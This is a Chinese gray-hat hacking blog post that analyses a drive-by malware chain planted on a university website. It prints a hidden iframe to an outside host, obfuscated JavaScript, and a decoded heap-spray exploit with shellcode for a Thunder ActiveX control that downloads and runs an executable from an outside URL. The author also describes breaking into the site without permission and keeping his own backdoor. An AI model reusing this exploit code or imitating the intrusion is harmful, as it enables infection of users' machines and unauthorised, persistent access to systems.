我的行为倾向于Gray Hat Hacking。深更半夜的时候收到同学的短信说教务处网站被挂马。我本对此事是睁一只眼，闭一只眼的……因为自己的处境是灰帽黑客(Gray Hat Hacker)的原因。不过还是有点忍不住了，终于开始入侵了！

也难怪教务处网站被挂马，数据库SA权限，空密码。防注入系统轻易绕过，入侵就这样一气呵成！我用我的webshell查到了其它黑客留下的后门，除了我自己的，还有四个。我判断这四个后门不应该是属于同一个黑客的。当务之急是清除挂马代码，在index.asp文件中发现代码（删掉！）：

<iframe src=http://www.5ibsj.com/kk/wm.htm width=0 height=0></iframe>

顺藤摸瓜发现下面的js代码：

eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!''.replace(/^/,String)){while(c--)d[e(c)]=k[c]||e(c);k=[function(e){return d[e]}];e=function(){return'\\w+'};c=1};while(c--)if(k[c])p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c]);return p}('4 b=3.8;4 a=b.z("7=");y(a!=-1){}x{4 2=w v();2.u(2.t()+s*r*q*9*9*p);3.8="7=o;2="+2.n();3.m("<i"+"5 l=\'k:j;\' h=g.f e=6 d=6 c=0></i"+"5>")}',36,36,'||expires|document|var|frame|10|woshiexp|cookie|60|start|cookieString|frameborder|height|width|htm|newads|src||none|display|style|write|toGMTString|Hellow|1000|24|30|12|getTime|setTime|Date|new|else|if|indexOf'.split('|'),0,{}))

这段js写得真好，将eval换成alert，运行此html页面（这是一个解密过程，想了解更多可以查看我这篇文章《JavaScript加密解密原理详解》），在弹出的信息中可以发现http://www.5ibsj.com/kk/newads.htm这个网页，这个网页奇怪的很！将其用记事本打开是下面这个模样：

当时我很纳闷，这都是什么！看第一行代码，这样的写法浏览器肯定不会按照HTML标签进行解释的啊！可是这些源码确实有效果（会往你电脑内植入木马）。果然我复制这些代码黏贴到新建的HTML页中，运行后是错误的！这就说明上面源码并不是我们见到的这样！那是怎么样的？肯定和编码有关系，我用Dreamweaver打开这个网页（托了COSBlog开发环境的福^^）。正常，如下代码（不过我还是无法解释具体是什么原因导致在记事本下查看出现上面截图的“乱码”！）

<SCRIPT LANGUAGE="JavaScript">

<!--

var HtmlStrings=["=TDSJQU >wbs!Xpset>#&4Dpckfdu!dmbttje&4E&33dmtje&4BFFEE7GG:&3E24","EF&3E5:7C&3E:B2D&3EE89C4326F377&33!je&4E&38ubshfu&38&4F&4D&3G","pckfdu&4F&1E&1B&4DTDSJQU!mbohvbhf&4E&33kbwbtdsjqu&33&4F&1E&1B","&1:wbs!tif243243243243mmd24pef!&4E!voftdbqf&39&33&36v:1:1&33&","3C&33&36v:1:1&33&3C!&1E&1B&33&36vfgf:&36v1111&36v6b11&36vb275","&36v1141&36v1111&36v519c&36v9c1d&33!&3C&1E&1B&33&36v2d81&36v9","cbe&36v1951&36ve99c&36v849c&36v9c4d&36v2f85&36v1489&33!&3C&1E","&1B&33&36v9cg4&36v318f&36vgc14&36v5f9c&36v4425&36v67fe&36v626","8&36v4g9c&33!&3C&1E&1B&33&36vgc14&36vg39c&36v1f7b&36vg46:&36v","85b7&36v6:19&36v946g&36v15d8&33!&3C&1E&1B&33&36vf356&36v6:f:&","36v6f6g&36vde9c&36v579c&36v1435&36ve2d4&36v14f2&33!&3C&1E&1B&","33&36v44d2&36v77d:&36v199c&36v579c&36v142d&36vd2d4&36v13f2&36","vd214&33!&3C&1E&1B&33&36v119c&36vd414&36vgb9c&36vg89c&36vd794","&36v9c1f&36v7be1&36v6:15&33!&3C&1E&1B&33&36v7bf9&36v1111&36v9","411&36v1ed7&36v6763&36v68gg&36v6bgd&36ve99c&33!&3C&1E&1B&33&3","6v127b&36vf96:&36v1168&36v1111&36vd794&36v6724&36v9157&36v914","f&33!&3C&1E&1B&33&36vgb86&36v4791&36v6f91&36vfd94&36v9c51&36v","d8ed&36v7414&36v757e&33!&3C&1E&1B&33&36v5431&36v5454&36v7754&","36v14d8&36v743g&36v5454&36v14d7&36v5431&33!&3C&1E&1B&33&36v31","7b&36vgg64&36vfd68&36v15d8&36v6d14&36v3f72&36vd876&36v1455&33","!&3C&1E&1B&33&36v8915&36v1176&36v4411&36v61d1&36v6461&36v6167","&36v68gg&36v9cgd&33!&3C&1E&1B&33&36v7bed&36v6411&36v68gg&36v7","9g1&36v3562&36v1151&36vgg69&36v44e1&33!&3C&1E&1B&33&36vbdd1&3","6vd196&36vg:86&36v6362&36v6467&36ve3gg&36v6:6b&36vf3bc&33!&3C","&1E&1B&33&36v44ff&36vd4d1&36v1df9&36vgggg&36v58gg&36v8576&36v","8361&36v747g&33!&3C&1E&1B&33&36v7552&36v8375&36v8476&36v1184&","36v7658&36v6485&36v848:&36v7685&33!&3C&1E&1B&33&36v557e&36v83","7:&36v7476&36v7g85&36v8:83&36v1152&36v7:68&36v567f&33!&3C&1E&","1B&33&36v7689&36v1174&36v8956&36v857:&36v7965&36v7683&36v7572","&36v5d11&33!&3C&1E&1B&33&36v727g&36v5d75&36v737:&36v7283&36v8",":83&36v1152&36v8386&36v7e7d&33!&3C&1E&1B&33&36v7f7g&36v6611&3","6v5d63&36v7g55&36v7f88&36v7g7d&36v7572&36v7g65&33!&3C&1E&1B&3","3&36v7:57&36v767d&36v1152&36v8579&36v8185&36v3g4b&36v883g&36v","8888&33!&3C&1E&1B&33&36v7e3f&36v7481&36v4949&36v743f&36v7e7g&","36v7e3g&36v3g74&36v787c&36v763f&36v7689&36v1111&33&3:&4C&1E&1","B&4D&3Gtdsjqu&4F&1E&1B&4DTDSJQU!mbohvbhf&4E&33kbwbtdsjqu&33&4","F&1E&1Bwbs!JtOpq2347437423!&4E!&38&38&4C&1E&1Bwbs!cj4234h2347","76cmp3242dl!&4E!voftdbqf&39&33&36v:1:1&36v:1:1&33&3:&4C&1E&1B","wbs!JtOpq2347437423!&4E!&38&38&4C&1E&1Bwbs!if243243befst23424","3j{f!&4E!31&4C&1E&1Bwbs!JtOpq2347437423!&4E!&38&38&4C&1E&1Bwb","s!tm32234223bdl423342423tqbdf!&4E!if243243befst234243j{f&3Cti","f243243243243mmd24pef&3Fmfohui&4C&1E&1Bwbs!JtOpq2347437423!&4","E!&38&38&4C&1E&1Bxijmf!&39cj4234h234776cmp3242dl&3Fmfohui&4Dt","m32234223bdl423342423tqbdf&3:!cj4234h234776cmp3242dl&3C&4Ecj4","234h234776cmp3242dl&4C&1E&1Bgjmmcmpdl!&4E!cj4234h234776cmp324","2dl&3Ftvctusjoh&391&3D!tm32234223bdl423342423tqbdf&3:&4C&1E&1","Bcmpdl!&4E!cj4234h234776cmp3242dl&3Ftvctusjoh&391&3D!cj4234h2","34776cmp3242dl&3Fmfohui&3Etm32234223bdl423342423tqbdf&3:&4C&1","E&1Bxijmf&39cmpdl&3Fmfohui&3Ctm32234223bdl423342423tqbdf&4D1y","51111&3:!cmpdl!&4E!cmpdl&3Ccmpdl&3Cgjmmcmpdl&4C&1E&1Bnfnpsz!&","4E!ofx!Bssbz&39&3:&4C&1E&1Bgps!&39y&4E1&4C!y&4D411&4C!y&3C&3C","&3:!nfnpsz&6Cy&6E!&4E!cmpdl!&3C!tif243243243243mmd24pef&4C&1E","&1Bwbs!c2v2342gg423fs!&4E!&38&38&4C&1E&1Bwbs!JtOpq2347437423!","&4E!&38&38&4C&1E&1Bwbs!JtOpq2347437423!&4E!&38&38&4C&1E&1Bxij","mf!&39c2v2342gg423fs&3Fmfohui!&4D!5168&3:!c2v2342gg423fs&3C&4","E&33&6Dy1b&6Dy1b&6Dy1b&6Dy1b&33&4C&1E&1Bc2v2342gg423fs&3C&4E&","33&6Dy1b&33&4C&1E&1Bc2v2342gg423fs&3C&4E&33&6Dy1b&33&4C&1E&1B","c2v2342gg423fs&3C&4E&33&6Dy1b&33&4C&1E&1Bc2v2342gg423fs&3C&4E","&33&6Dy1b&6Dy1b&6Dy1b&6Dy1b&33&4C&1E&1Bc2v2342gg423fs&3C&4E&3","3&6Dy1b&6Dy1b&6Dy1b&6Dy1b&33&4C!&1E&1Bwbs!zft&4E&332222&33&4C","&1E&1Bubshfu&3FEpxoVSM3&39c2v2342gg423fs&3Dzft&3Dzft&3Dzft&3:","&4C&1E&1Bwbs!JtOpq2347437423!&4E!&38&38&4C&1E&1B&4D&3Gtdsjqu&","4F&1E&1B#<epdvnfou/xsjuf)voftdbqf)Xpset**=0TDSJQU > "];

function psw(st){

     var varS;

     varS="";

     var i;

     for(var a=0;a<st.length;a++){

       i = st.charCodeAt(a);

       if (i==1)

         varS=varS+String.fromCharCode('"'.charCodeAt()-1);

       else if (i==2) {

         a++;

         varS+=String.fromCharCode(st.charCodeAt(a));

         }
       else
         varS+=String.fromCharCode(i-1);

     }

     return varS;

};

var num=63;

function S(){

for(i=0;i<num;i++)
     document.write(psw(HtmlStrings[i]));}
//在这两行代码之前加上document.write("<xmp>");就可以将上面乱码解密显示出来！

S();

// -->

</SCRIPT>

又是加密的，解密也简单，不知道大家是否还记得我以前写过的《<XMP>标签解密大法》？答案就是上面代码红色标注部分。解密出来后的代码如下：

<object classid="clsid:EEDD6FF9-13DE-496B-9A1C-D78B3215E266" id='target'></object>
<SCRIPT language="javascript">
var she132132132132llc13ode = unescape("%u9090"+"%u9090"+
"%uefe9%u0000%u5a00%ua164%u0030%u0000%u408b%u8b0c" +
"%u1c70%u8bad%u0840%ud88b%u738b%u8b3c%u1e74%u0378" +
"%u8bf3%u207e%ufb03%u4e8b%u3314%u56ed%u5157%u3f8b" +
"%ufb03%uf28b%u0e6a%uf359%u74a6%u5908%u835f%u04c7" +
"%ue245%u59e9%u5e5f%ucd8b%u468b%u0324%ud1c3%u03e1" +
"%u33c1%u66c9%u088b%u468b%u031c%uc1c3%u02e1%uc103" +
"%u008b%uc303%ufa8b%uf78b%uc683%u8b0e%u6ad0%u5904" +
"%u6ae8%u0000%u8300%u0dc6%u5652%u57ff%u5afc%ud88b" +
"%u016a%ue859%u0057%u0000%uc683%u5613%u8046%u803e" +
"%ufa75%u3680%u5e80%uec83%u8b40%uc7dc%u6303%u646d" +
"%u4320%u4343%u6643%u03c7%u632f%u4343%u03c6%u4320" +
"%u206a%uff53%uec57%u04c7%u5c03%u2e61%uc765%u0344" +
"%u7804%u0065%u3300%u50c0%u5350%u5056%u57ff%u8bfc" +
"%u6adc%u5300%u57ff%u68f0%u2451%u0040%uff58%u33d0" +
"%uacc0%uc085%uf975%u5251%u5356%ud2ff%u595a%ue2ab" +
"%u33ee%uc3c0%u0ce8%uffff%u47ff%u7465%u7250%u636f" +
"%u6441%u7264%u7365%u0073%u6547%u5374%u7379%u6574" +
"%u446d%u7269%u6365%u6f74%u7972%u0041%u6957%u456e" +
"%u6578%u0063%u7845%u7469%u6854%u6572%u6461%u4c00" +
"%u616f%u4c64%u6269%u6172%u7972%u0041%u7275%u6d6c" +
"%u6e6f%u5500%u4c52%u6f44%u6e77%u6f6c%u6461%u6f54" +
"%u6946%u656c%u0041%u7468%u7074%u2f3a%u772f%u7777" +
"%u6d2e%u6370%u3838%u632e%u6d6f%u6d2f%u2f63%u676b%u652e%u6578%u0000");
</script>
<SCRIPT language="javascript">
var IsNop1236326312 = '';
var bi3123g123665blo2131ck = unescape("%u9090%u9090");
var IsNop1236326312 = '';
var he132132aders123132ize = 20;
var IsNop1236326312 = '';
var sl21123112ack312231312space = he132132aders123132ize+she132132132132llc13ode.length;
var IsNop1236326312 = '';
while (bi3123g123665blo2131ck.length<sl21123112ack312231312space) bi3123g123665blo2131ck+=bi3123g123665blo2131ck;
fillblock = bi3123g123665blo2131ck.substring(0, sl21123112ack312231312space);
block = bi3123g123665blo2131ck.substring(0, bi3123g123665blo2131ck.length-sl21123112ack312231312space);
while(block.length+sl21123112ack312231312space<0x40000) block = block+block+fillblock;
memory = new Array();
for (x=0; x<300; x++) memory[x] = block + she132132132132llc13ode;
var b1u1231ff312er = '';
var IsNop1236326312 = '';
var IsNop1236326312 = '';
while (b1u1231ff312er.length < 4057) b1u1231ff312er+="\x0a\x0a\x0a\x0a";
b1u1231ff312er+="\x0a";
b1u1231ff312er+="\x0a";
b1u1231ff312er+="\x0a";
b1u1231ff312er+="\x0a\x0a\x0a\x0a";
b1u1231ff312er+="\x0a\x0a\x0a\x0a";
var yes="1111";
target.DownURL2(b1u1231ff312er,yes,yes,yes);
var IsNop1236326312 = '';
</script>

唉，Thunder 5.6.9.344 ActiveX的ShellCode，木马地址在哪呢？又要解密，不过这个解密就不是常规的解密了。用下面这段代码来解密吧（不知道是谁写的）：

<script language=javascript>
string="%u7777%u6d2e%u6370%u3838%u632e%u6d6f%u6d2f%u2f63%u676b%u652e%u6578%u0000";
//红色部分就是上面的16进制ASCII码的部分了。将此代码保存为html文件，运行即可。
ustr=unescape(string);
var code;
var high,low=0;
for(var i=0;i<ustr.length;i++)
{
code=ustr.charCodeAt(i);
low=code%256;
high=(code-low)/256;
document.write(String.fromCharCode(low)+String.fromCharCode(high));
}
</script>

最后挖出木马地址信息：GetProcAddressGetSystemDirectoryAWinExecExitThreadoadLibraryAurlmonRLDownloadToFileAhttp://www.mpc88.com/mc/kg.exe好了，木马的来龙去脉就分析清楚了，那现在就是将黑客们留下的所有资料摧毁，然后偷偷种下蜜罐！哼！看你再来，记下你的所有操作信息！我不喜欢教务处，这次又是我帮了你们的大忙！不过我保留下我自己的后门，反正我也不希望看到同学们上教务处网站就中病毒，就让我继续充当灰帽黑客(Gray Hat Hacker)的角色吧！

这次的保卫战，我收获了四个不同的后门，不错，不错！很有利用价值，然后还有两个病毒，其中一个绕过了微点，一个是OnlineGames的新变种：Trojan-PSW.Win32.OnLineGames.ksh。。。不过现在没空分析病毒。现在COSBlog也没更新了，过几天一口气更新，然后发布正式版吧，现在还是感觉渗透测试与漏洞分析技术不错。

--------------------------------------------------------------------------------------------------------------------------

2008.01.09注：唉，不能冠以Black Hat这个名称啊，连我自己都误会了！所以将文章有Black Hat的字眼都删除。以免引发不必要的误会。